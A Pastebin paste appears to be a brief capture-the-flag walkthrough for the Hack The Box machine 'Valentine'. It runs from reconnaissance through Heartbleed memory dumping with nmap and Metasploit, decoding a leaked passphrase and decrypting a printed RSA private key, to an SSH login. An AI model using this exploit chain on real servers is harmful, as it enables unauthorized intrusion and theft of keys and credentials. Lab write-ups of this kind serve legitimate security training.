Advertisement
Guest User

Untitled

a guest
Jul 15th, 2018
1,506
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
  1. Hack RussianMan
  2.  
  3.  
  4. https://www.hackthebox.eu/home/machines/profile/127
  5. 10.10.10.79
  6. Valentine
  7.  
  8.  
  9. Step 1
  10. Nmap -sV 10.10.10.79
  11. step 2
  12. dirb http://10.10.10.79
  13. Resut: http://10.10.10.79/dev
  14. {
  15. hype_key and note.txt
  16. {
  17. Step 3 hype_key -> hex to asci
  18. Result: -----BEGIN RSA PRIVATE KEY-----
  19. Proc-Type: 4,ENCRYPTED
  20. DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
  21.  
  22. DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
  23. 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
  24. 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
  25. Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
  26. OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
  27. pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
  28. QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
  29. p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
  30. Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
  31. t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
  32. XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
  33. aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
  34. +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
  35. AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
  36. r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
  37. 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
  38. e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
  39. 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
  40. dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
  41. cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
  42. pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
  43. Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
  44. suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
  45. l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
  46. RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
  47. -----END RSA PRIVATE KEY-----
  48. encode key!!!
  49. }
  50. }
  51.  
  52. Step 4
  53. nmap -p 443 --script ssl-heartbleed.nse 10.10.10.79
  54.  
  55. Step 5 msfconsole
  56. {
  57. use auxiliary/scanner/ssl/openssl_heartbleed
  58. set RHOSTS 10.10.10.79
  59. set ACTION DUMP
  60. set VERBOSE true
  61. RUN
  62. Result:aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== -> heartbleedbelievethehype
  63. decode base 64
  64. Step 6
  65. openssl rsa -in hype_key -out key password heartbleedbelievethehype
  66. step 7 chmod 400 key
  67. step 8 ssh hype@10.10.10.79 -i key
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement